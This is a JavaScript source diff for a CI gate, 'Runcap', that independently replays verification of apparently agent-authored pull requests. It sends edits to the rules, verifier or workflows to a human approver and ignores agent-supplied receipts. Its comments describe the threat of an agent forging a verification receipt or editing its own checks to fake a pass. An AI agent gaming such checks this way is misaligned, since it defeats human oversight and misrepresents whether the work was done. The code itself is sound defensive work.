function isPolicyPath(relPath) {
|
|
193
|
+
return POLICY_FILENAMES.some((n) => relPath === path.posix.join(".runcap", n));
|
|
194
|
+
}
|
|
195
|
+
|
|
196
|
+
function isDependencyPath(relPath) {
|
|
197
|
+
const base = relPath.split("/").pop();
|
|
198
|
+
return DEPENDENCY_FILES.includes(base);
|
|
199
|
+
}
|
|
200
|
+
|
|
201
|
+
// Walk `git diff --raw -z --find-renames base head`. -z gives NUL-delimited
|
|
202
|
+
// fields; rename/copy records carry two paths, everything else one.
|
|
203
|
+
function parseRawDiff(buffer) {
|
|
204
|
+
const parts = buffer.toString("utf8").split("\0");
|
|
205
|
+
const entries = [];
|
|
206
|
+
let i = 0;
|
|
207
|
+
while (i < parts.length) {
|
|
208
|
+
const meta = parts[i];
|
|
209
|
+
if (!meta || meta[0] !== ":") { i++; continue; }
|
|
210
|
+
// ":<oldmode> <newmode> <oldsha> <newsha> <status>"
|
|
211
|
+
const fields = meta.slice(1).split(/\s+/);
|
|
212
|
+
const oldMode = fields[0];
|
|
213
|
+
const newMode = fields[1];
|
|
214
|
+
const statusField = fields[4] ?? "";
|
|
215
|
+
const statusChar = statusField[0] ?? "";
|
|
216
|
+
i++;
|
|
217
|
+
if (statusChar === "R" || statusChar === "C") {
|
|
218
|
+
const srcPath = parts[i]; const dstPath = parts[i + 1];
|
|
219
|
+
i += 2;
|
|
220
|
+
entries.push({ statusChar, statusField, oldMode, newMode, srcPath, path: dstPath });
|
|
221
|
+
} else {
|
|
222
|
+
const p = parts[i];
|
|
223
|
+
i += 1;
|
|
224
|
+
entries.push({ statusChar, statusField, oldMode, newMode, path: p });
|
|
225
|
+
}
|
|
226
|
+
}
|
|
227
|
+
return entries;
|
|
228
|
+
}
|
|
229
|
+
|
|
230
|
+
function looksBinary(buffer) {
|
|
231
|
+
// A NUL byte in the first 8KB is git's own "binary" heuristic.
|
|
232
|
+
const slice = buffer.subarray(0, 8192);
|
|
233
|
+
return slice.includes(0);
|
|
234
|
+
}
|
|
235
|
+
|
|
236
|
+
function isValidUtf8(buffer) {
|
|
237
|
+
try {
|
|
238
|
+
new TextDecoder("utf-8", { fatal: true }).decode(buffer);
|
|
239
|
+
return true;
|
|
240
|
+
} catch {
|
|
241
|
+
return false;
|
|
242
|
+
}
|
|
243
|
+
}
|
|
244
|
+
|
|
245
|
+
// Classify one diff entry into candidate | blocked | human, with a reason.
|
|
246
|
+
// Structural rejects come first (never auto-approvable), then sensitive paths
|
|
247
|
+
// (human gate), then scope (block), then the in-scope regular edit (candidate).
|
|
248
|
+
async function classifyEntry(entry, { headSha, cwd, protectedPaths, allowed, verifierPaths }) {
|
|
249
|
+
const p = entry.path;
|
|
250
|
+
const s = entry.statusChar;
|
|
251
|
+
|
|
252
|
+
if (s === "D") return { path: p, class: "blocked", detail: "file deleted (deletions are never auto-approved)" };
|
|
253
|
+
if (s === "R") return { path: p, class: "blocked", detail: `file renamed from ${entry.srcPath} (renames are never auto-approved)` };
|
|
254
|
+
if (s === "C") return { path: p, class: "blocked", detail: `file copied from ${entry.srcPath} (copies are never auto-approved)` };
|
|
255
|
+
if (s === "T") return { path: p, class: "blocked", detail: "file type changed (type changes are never auto-approved)" };
|
|
256
|
+
if (entry.newMode === "120000") return { path: p, class: "blocked", detail: "symlink (symlinks are never auto-approved)" };
|
|
257
|
+
if (entry.newMode === "160000") return { path: p, class: "blocked", detail: "submodule/gitlink (submodules are never auto-approved)" };
|
|
258
|
+
if (s === "M" && entry.oldMode !== entry.newMode) return { path: p, class: "blocked", detail: `mode change ${entry.oldMode} -> ${entry.newMode} (mode changes are never auto-approved)` };
|
|
259
|
+
if (entry.newMode !== "100644") return { path: p, class: "blocked", detail: `non-regular file mode ${entry.newMode} (only plain 100644 text files can be auto-applied)` };
|
|
260
|
+
if (s !== "A" && s !== "M") return { path: p, class: "blocked", detail: `unsupported diff status ${entry.statusField}` };
|
|
261
|
+
|
|
262
|
+
// Content checks on the HEAD blob (the bytes we would apply).
|
|
263
|
+
const got = await gitShowBytes(headSha, p, cwd);
|
|
264
|
+
if (!got.ok) return { path: p, class: "blocked", detail: `could not read head blob: ${got.error}` };
|
|
265
|
+
if (looksBinary(got.buffer)) return { path: p, class: "blocked", detail: "binary content (only UTF-8 text files can be auto-applied)" };
|
|
266
|
+
if (!isValidUtf8(got.buffer)) return { path: p, class: "blocked", detail: "not valid UTF-8 (only UTF-8 text files can be auto-applied)" };
|
|
267
|
+
const head = got.buffer.toString("utf8");
|
|
268
|
+
if (head.startsWith(LFS_POINTER_SIGNATURE)) return { path: p, class: "blocked", detail: "Git LFS pointer (real content is not in the tree, cannot replay)" };
|
|
269
|
+
|
|
270
|
+
// Sensitive-path human gate: the rules or the evidence themselves.
|
|
271
|
+
if (isPolicyPath(p)) return { path: p, class: "human", detail: "edits the mission policy (the rules) - human CODEOWNER must approve" };
|
|
272
|
+
if (isWorkflowPath(p)) return { path: p, class: "human", detail: "edits a GitHub workflow - human CODEOWNER must approve" };
|
|
273
|
+
if (verifierPaths.includes(p)) return { path: p, class: "human", detail: "edits a verifier file (the evidence) - human CODEOWNER must approve" };
|
|
274
|
+
if (isDependencyPath(p)) return { path: p, class: "human", detail: "edits a dependency manifest/lockfile - human CODEOWNER must approve" };
|
|
275
|
+
if (isProtectedPath(p, protectedPaths)) return { path: p, class: "human", detail: "edits a protected/test/config path - human CODEOWNER must approve" };
|
|
276
|
+
|
|
277
|
+
// In-scope regular text edit. Out-of-scope edits are blocked.
|
|
278
|
+
if (!withinAllowed(p, allowed)) return { path: p, class: "blocked", detail: "outside the policy's allowed scope" };
|
|
279
|
+
|
|
280
|
+
return { path: p, class: "candidate", detail: s === "A" ? "added in-scope text file" : "modified in-scope text file", blob: got.buffer };
|
|
281
|
+
}
|
|
282
|
+
|
|
283
|
+
// The concrete file paths a verify command names, resolved at the BASE commit so
|
|
284
|
+
// a head-side rename of the verifier cannot hide it from the human gate.
|
|
285
|
+
async function verifierFilesAtBase(verify, baseSha, cwd) {
|
|
286
|
+
const tokens = String(verify).split(/\s+/).filter(Boolean);
|
|
287
|
+
const files = [];
|
|
288
|
+
for (const raw of tokens) {
|
|
289
|
+
const tok = raw.replace(/^["']|["']$/g, "");
|
|
290
|
+
if (!/[./]/.test(tok)) continue;
|
|
291
|
+
const rel = tok.replace(/^\.\//, "");
|
|
292
|
+
if (await blobExists(baseSha, rel, cwd)) {
|
|
293
|
+
if (!files.includes(rel)) files.push(rel);
|
|
294
|
+
}
|
|
295
|
+
}
|
|
296
|
+
return files;
|
|
297
|
+
}
|
|
298
|
+
|
|
299
|
+
// --- the replay -------------------------------------------------------------
|
|
300
|
+
|
|
301
|
+
// Baseline + replay in a throwaway worktree pinned at the base commit. Deps come
|
|
302
|
+
// from the base lockfile (npm ci --ignore-scripts: no lifecycle scripts, no
|
|
303
|
+
// floating install). Then the permitted candidate blobs are written in and the
|
|
304
|
+
// base-pinned verifier runs again. Truth comes only from this replay.
|
|
305
|
+
async function replay({ baseSha, candidates, verify, cwd }) {
|
|
306
|
+
const tmpBase = await mkdtempWorktreeBase();
|
|
307
|
+
const wt = path.join(tmpBase, `wt-${createHash("sha1").update(`${baseSha}${Date.now()}${Math.random()}`).digest("hex").slice(0, 8)}`);
|
|
308
|
+
const add = await git(["worktree", "add", "--detach", wt, baseSha], cwd);
|
|
309
|
+
if (add.error) {
|
|
310
|
+
return { baselineFailed: null, replayPassed: null, dependencyInstall: "skipped_no_manifest", detail: `worktree add failed: ${add.error}`, ran: false };
|
|
311
|
+
}
|
|
312
|
+
try {
|
|
313
|
+
// Base-pinned dependency install (only when the base has a lockfile).
|
|
314
|
+
let dependencyInstall = "skipped_no_manifest";
|
|
315
|
+
const hasPkg = existsSync(path.join(wt, "package.json"));
|
|
316
|
+
const hasLock = existsSync(path.join(wt, "package-lock.json")) || existsSync(path.join(wt, "npm-shrinkwrap.json"));
|
|
317
|
+
if (hasPkg && hasLock) {
|
|
318
|
+
const ci = await runShell("npm ci --ignore-scripts --no-audit --no-fund", wt);
|
|
319
|
+
dependencyInstall = ci.exitCode === 0 ? "npm_ci_ignore_scripts" : "failed";
|
|
320
|
+
if (ci.exitCode !== 0) {
|
|
321
|
+
return { baselineFailed: null, replayPassed: null, dependencyInstall, detail: "npm ci (base-pinned, --ignore-scripts) failed", ran: true };
|
|
322
|
+
}
|
|
323
|
+
}
|
|
324
|
+
|
|
325
|
+
// 1. Baseline: the task must genuinely fail at base, or a later pass is meaningless.
|
|
326
|
+
const baseline = await runShell(verify, wt);
|
|
327
|
+
const baselineFailed = baseline.exitCode !== 0;
|
|
328
|
+
|
|
329
|
+
// 2. Apply only the permitted candidate blobs from head.
|
|
330
|
+
for (const c of candidates) {
|
|
331
|
+
const dst = path.join(wt, c.path);
|
|
332
|
+
await mkdir(path.dirname(dst), { recursive: true });
|
|
333
|
+
await writeFile(dst, c.blob);
|
|
334
|
+
}
|
|
335
|
+
|
|
336
|
+
// 3. Replay the base-pinned verifier with the change applied.
|
|
337
|
+
const after = await runShell(verify, wt);
|
|
338
|
+
const replayPassed = after.exitCode === 0;
|
|
339
|
+
|
|
340
|
+
return { baselineFailed, replayPassed, dependencyInstall, ran: true, detail: "baseline + replay completed in a clean base checkout" };
|
|
341
|
+
} finally {
|
|
342
|
+
await git(["worktree", "remove", "--force", wt], cwd);
|
|
343
|
+
await rm(tmpBase, { recursive: true, force: true }).catch(() => {});
|
|
344
|
+
}
|
|
345
|
+
}
|
|
346
|
+
|
|
347
|
+
async function mkdtempWorktreeBase() {
|
|
348
|
+
const base = path.join(os.tmpdir(), `runcap-adj-${process.pid}-${Date.now()}`);
|
|
349
|
+
await mkdir(base, { recursive: true });
|
|
350
|
+
return base;
|
|
351
|
+
}
|
|
352
|
+
|
|
353
|
+
// --- agent telemetry: deliberately NOT read by the required gate ------------
|
|
354
|
+
|
|
355
|
+
// The agent's receipt is agent-controlled input. A forged "VERIFIED_STRONG"
|
|
356
|
+
// receipt is exactly the Tier 2 attack this gate exists to defeat, so the
|
|
357
|
+
// required job must never parse it: not to grade the verdict (it never did),
|
|
358
|
+
// and not even to display it, because reading attacker-controlled JSON in the
|
|
359
|
+
// mandatory check is needless attack surface (a malformed or enormous receipt
|
|
360
|
+
// could crash or stall the only gate guarding the merge). The verdict therefore
|
|
361
|
+
// reports a constant, telling a reviewer plainly that no receipt was consulted.
|
|
362
|
+
// A later, NON-required report layer may surface advisory telemetry; the gate
|
|
363
|
+
// that decides the merge does not.
|
|
364
|
+
const GATE_AGENT_TELEMETRY = Object.freeze({
|
|
365
|
+
present: false,
|
|
366
|
+
influence_on_verdict: "none",
|
|
367
|
+
truth: "agent_receipt_not_read_by_required_gate"
|
|
368
|
+
});
|
|
369
|
+
|
|
370
|
+
// --- the adjudicator --------------------------------------------------------
|
|
371
|
+
|
|
372
|
+
export async function adjudicate({ cwd = process.cwd(), baseFlag, headFlag, policyPath } = {}) {
|
|
373
|
+
const hardening = { required_profile: "documented", runtime_attestation: "not_performed_in_pr_job" };
|
|
374
|
+
const agentTelemetry = GATE_AGENT_TELEMETRY;
|
|
375
|
+
|
|
376
|
+
const base = (verdict, reasons, extra = {}) => ({
|
|
377
|
+
schema: "runcap.ci-verdict/v1",
|
|
378
|
+
verdict,
|
|
379
|
+
reasons,
|
|
380
|
+
repository_hardening: hardening,
|
|
381
|
+
agent_telemetry: agentTelemetry,
|
|
382
|
+
truth: "recomputed_by_adjudicator_from_base_sha",
|
|
383
|
+
...extra
|
|
384
|
+
});
|
|
385
|
+
|
|
386
|
+
// 1. Resolve base/head from the trusted PR event only.
|
|
387
|
+
const { baseSha, headSha, shaSource } = resolveShas({ baseFlag, headFlag });
|
|
388
|
+
if (!baseSha || !headSha) {
|
|
389
|
+
return base("BLOCKED", ["Could not resolve base/head from the trusted pull_request event (and no explicit --base/--head). Refusing to adjudicate."], { sha_source: shaSource });
|
|
390
|
+
}
|
|
391
|
+
if (shaSource.startsWith("untrusted_event")) {
|
|
392
|
+
return base("BLOCKED", [`Refusing to adjudicate an untrusted event (${shaSource}). Only the read-only pull_request event is adjudicated.`], { base_sha: baseSha, head_sha: headSha, sha_source: shaSource });
|
|
393
|
+
}
|
|
394
|
+
if (!(await revExists(baseSha, cwd)) || !(await revExists(headSha, cwd))) {
|
|
395
|
+
return base("BLOCKED", ["base or head commit is not present in the checkout (fetch depth too shallow?). Refusing to adjudicate."], { base_sha: baseSha, head_sha: headSha, sha_source: shaSource });
|
|
396
|
+
}
|
|
397
|
+
|
|
398
|
+
// 2. Policy from the BASE commit (the approved rules), then validate it.
|
|
399
|
+
const loaded = await loadPolicyFromBase(baseSha, policyPath, cwd);
|
|
400
|
+
if (loaded.error) {
|
|
401
|
+
return base("BLOCKED", [loaded.error], { base_sha: baseSha, head_sha: headSha, sha_source: shaSource });
|
|
402
|
+
}
|
|
403
|
+
const policyResult = loaded.result;
|
|
404
|
+
const { ok, errors } = validatePolicy(policyResult.policy);
|
|
405
|
+
if (!ok) {
|
|
406
|
+
return base("BLOCKED", errors.map((e) => `base policy invalid: ${e}`), { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyMeta(policyResult) });
|
|
407
|
+
}
|
|
408
|
+
const verification = policyResult.policy.verification ?? {};
|
|
409
|
+
const verify = verification.command;
|
|
410
|
+
const protectedPaths = Array.isArray(verification.protect) ? verification.protect : [];
|
|
411
|
+
const allowed = Array.isArray(verification.allow) ? verification.allow : [];
|
|
412
|
+
const verifierPaths = await verifierFilesAtBase(verify, baseSha, cwd);
|
|
413
|
+
|
|
414
|
+
// 3. Compute the base..head diff ourselves and classify every entry.
|
|
415
|
+
const rawDiff = await new Promise((resolve) => {
|
|
416
|
+
const child = spawn("git", ["diff", "--raw", "-z", "--find-renames", baseSha, headSha], { cwd, shell: false });
|
|
417
|
+
const chunks = [];
|
|
418
|
+
child.stdout.on("data", (c) => chunks.push(c));
|
|
419
|
+
child.on("error", () => resolve(Buffer.alloc(0)));
|
|
420
|
+
child.on("close", () => resolve(Buffer.concat(chunks)));
|
|
421
|
+
});
|
|
422
|
+
const entries = parseRawDiff(rawDiff);
|
|
423
|
+
const classified = [];
|
|
424
|
+
for (const entry of entries) {
|
|
425
|
+
classified.push(await classifyEntry(entry, { headSha, cwd, protectedPaths, allowed, verifierPaths }));
|
|
426
|
+
}
|
|
427
|
+
const publicClassification = classified.map(({ blob, ...rest }) => rest);
|
|
428
|
+
|
|
429
|
+
const blocked = classified.filter((c) => c.class === "blocked");
|
|
430
|
+
const human = classified.filter((c) => c.class === "human");
|
|
431
|
+
const candidates = classified.filter((c) => c.class === "candidate");
|
|
432
|
+
|
|
433
|
+
const policyBlock = policyMeta(policyResult);
|
|
434
|
+
|
|
435
|
+
// 4. Verdict precedence: any structural/scope reject blocks; else a sensitive
|
|
436
|
+
// path sends it to a human; else we must reproduce the proof ourselves.
|
|
437
|
+
if (blocked.length) {
|
|
438
|
+
return base("BLOCKED", blocked.map((b) => `${b.path}: ${b.detail}`), {
|
|
439
|
+
base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock,
|
|
440
|
+
diff_classification: publicClassification
|
|
441
|
+
});
|
|
442
|
+
}
|
|
443
|
+
if (human.length) {
|
|
444
|
+
return base("HUMAN_APPROVAL_REQUIRED",
|
|
445
|
+
["Runcap declined to issue an automated proof: the change touches the rules or the evidence themselves. A human CODEOWNER must approve.", ...human.map((h) => `${h.path}: ${h.detail}`)],
|
|
446
|
+
{ base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification });
|
|
447
|
+
}
|
|
448
|
+
if (candidates.length === 0) {
|
|
449
|
+
return base("BLOCKED", ["No applicable code change to adjudicate (empty or non-content diff)."], {
|
|
450
|
+
base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification
|
|
451
|
+
});
|
|
452
|
+
}
|
|
453
|
+
|
|
454
|
+
// 5. Replay from the base commit with only the candidate blobs applied.
|
|
455
|
+
const r = await replay({ baseSha, candidates, verify, cwd });
|
|
456
|
+
const codeEvidence = {
|
|
457
|
+
truth: "recomputed_by_adjudicator_from_base_sha",
|
|
458
|
+
baseline_failed: r.baselineFailed,
|
|
459
|
+
replay_passed: r.replayPassed,
|
|
460
|
+
dependency_install: r.dependencyInstall,
|
|
461
|
+
candidate_files: candidates.map((c) => c.path),
|
|
462
|
+
detail: r.detail
|
|
463
|
+
};
|
|
464
|
+
|
|
465
|
+
const reasons = [];
|
|
466
|
+
if (r.dependencyInstall === "failed") reasons.push("Base-pinned `npm ci --ignore-scripts` failed: cannot establish a clean baseline.");
|
|
467
|
+
if (r.baselineFailed === false) reasons.push("Baseline already green: the verifier passed at the base commit, so a post-change pass proves nothing.");
|
|
468
|
+
if (r.replayPassed !== true) reasons.push("Replay did not pass: the change did not make the base-pinned verifier pass in a clean base checkout.");
|
|
469
|
+
|
|
470
|
+
if (reasons.length) {
|
|
471
|
+
return base("BLOCKED", reasons, { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification, code_evidence: codeEvidence });
|
|
472
|
+
}
|
|
473
|
+
|
|
474
|
+
return base("PASS",
|
|
475
|
+
[`Verifier failed at base and passed after applying ${candidates.length} in-scope text change(s), recomputed in a clean base checkout.`],
|
|
476
|
+
{ base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification, code_evidence: codeEvidence });
|
|
477
|
+
}
|
|
478
|
+
|
|
479
|
+
// Markdown lines for the PR step summary + terminal print.
|
|
480
|
+
export function formatAdjudication(v) {
|
|
481
|
+
const lines = [
|
|
482
|
+
`Runcap CI adjudication (independent replay from base)`,
|
|
483
|
+
`====================================================`,
|
|
484
|
+
`Verdict: ${v.verdict}`,
|
|
485
|
+
`Base SHA: ${v.base_sha ?? "unresolved"} (source: ${v.sha_source ?? "unknown"})`,
|
|
486
|
+
`Head SHA: ${v.head_sha ?? "unresolved"}`
|
|
487
|
+
];
|
|
488
|
+
if (v.policy) {
|
|
489
|
+
lines.push(`Policy: ${v.policy.mission?.name ?? "(unnamed)"} - hash ${v.policy.hash}`);
|
|
490
|
+
}
|
|
491
|
+
if (v.code_evidence) {
|
|
492
|
+
const ce = v.code_evidence;
|
|
493
|
+
lines.push(`Replay: baseline_failed=${ce.baseline_failed} replay_passed=${ce.replay_passed} deps=${ce.dependency_install}`);
|
|
494
|
+
}
|
|
495
|
+
lines.push(`Hardening: required_profile=${v.repository_hardening.required_profile}, runtime_attestation=${v.repository_hardening.runtime_attestation}`);
|
|
496
|
+
lines.push(`Agent receipt: not read by this required gate (verdict is recomputed from the base commit).`);
|
|
497
|
+
if (Array.isArray(v.reasons) && v.reasons.length) {
|
|
498
|
+
lines.push(v.verdict === "PASS" ? `Why:` : `Why ${v.verdict}:`);
|
|
499
|
+
for (const r of v.reasons) lines.push(` - ${r}`);
|
|
500
|
+
}
|
|
501
|
+
return lines;
|
|
502
|
+
}
|
|
503
|
+
|
|
504
|
+
// Exit code: PASS and HUMAN_APPROVAL_REQUIRED are non-failing (the human gate is
|
|
505
|
+
// a success/neutral outcome that hands authority to a CODEOWNER); BLOCKED fails.
|
|
506
|
+
export function exitCodeFor(verdict) {
|
|
507
|
+
return verdict === "BLOCKED" ? 1 : 0;
|
|
508
|
+
}
|